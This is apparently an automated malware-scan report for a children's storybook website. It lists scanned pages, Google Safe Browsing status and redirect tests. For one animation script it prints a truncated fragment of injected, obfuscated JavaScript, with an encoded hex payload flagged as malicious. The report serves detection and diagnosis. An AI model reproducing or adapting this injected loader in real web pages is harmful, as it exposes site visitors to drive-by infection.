Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thestorytellersgarden.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://thestorytellersgarden.com/ | 200 OK Content-Length: 5006 Content-Type: text/html | clean |
http://thestorytellersgarden.com/sg_jscripts/eventlistener.js | 200 OK Content-Length: 647 Content-Type: application/javascript | clean |
http://thestorytellersgarden.com/sg_jscripts/resize.js | 200 OK Content-Length: 1756 Content-Type: application/javascript | clean |
http://thestorytellersgarden.com/sg_jscripts/textresizedetector.js | 200 OK Content-Length: 3505 Content-Type: application/javascript | clean |
http://thestorytellersgarden.com/happy-dragon.php | 200 OK Content-Length: 8168 Content-Type: text/html | clean |
http://thestorytellersgarden.com/sg_jscripts/jquery132pre.js | 200 OK Content-Length: 39364 Content-Type: application/javascript | clean |
http://thestorytellersgarden.com/sg_jscripts/misc.js | 200 OK Content-Length: 887 Content-Type: application/javascript | clean |
http://thestorytellersgarden.com/sg_jscripts/Tween.js | 200 OK Content-Length: 9689 Content-Type: application/javascript | clean |
http://thestorytellersgarden.com/happy-dragon-website_anim.js | 200 OK Content-Length: 11365 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) glcc=String;wyo="spl"+"i"+"t";vod=window;zhqnh=(1)?"0x":"123";roursx=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(jzxhg){ppuiaf=false;try{}catch(ydqzez){ppuiaf=21;}if(1){rzb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq62Zq60Zq71Zq5fZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17 Antivirus reports:
| ||
http://thestorytellersgarden.com/sg_jscripts/popmenu.js | 200 OK Content-Length: 2722 Content-Type: application/javascript | clean |
http://thestorytellersgarden.com/index.php | 200 OK Content-Length: 5006 Content-Type: text/html | clean |
http://thestorytellersgarden.com/good-witch-books-page.php | 200 OK Content-Length: 6834 Content-Type: text/html | clean |
http://thestorytellersgarden.com/lucious-the-owl-books-page.php | 200 OK Content-Length: 6708 Content-Type: text/html | clean |
http://thestorytellersgarden.com/about-nicky-bateman.php | 200 OK Content-Length: 7483 Content-Type: text/html | clean |
http://thestorytellersgarden.com/contact-page.php | 200 OK Content-Length: 6955 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thestorytellersgarden.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 01:14:24 GMT
Server: Apache
Content-Length: 5006
Content-Type: text/html
X-Powered-By: PHP/5.4.35
...5006 bytes of data.
GET / HTTP/1.1
Host: thestorytellersgarden.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 01:14:24 GMT
Server: Apache
Content-Length: 5006
Content-Type: text/html
X-Powered-By: PHP/5.4.35
...5006 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: thestorytellersgarden.com
Referer: http://www.google.com/search?q=thestorytellersgarden.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thestorytellersgarden.com
Referer: http://www.google.com/search?q=thestorytellersgarden.com
Result:
The result is similar to the first query. There are no suspicious redirects found.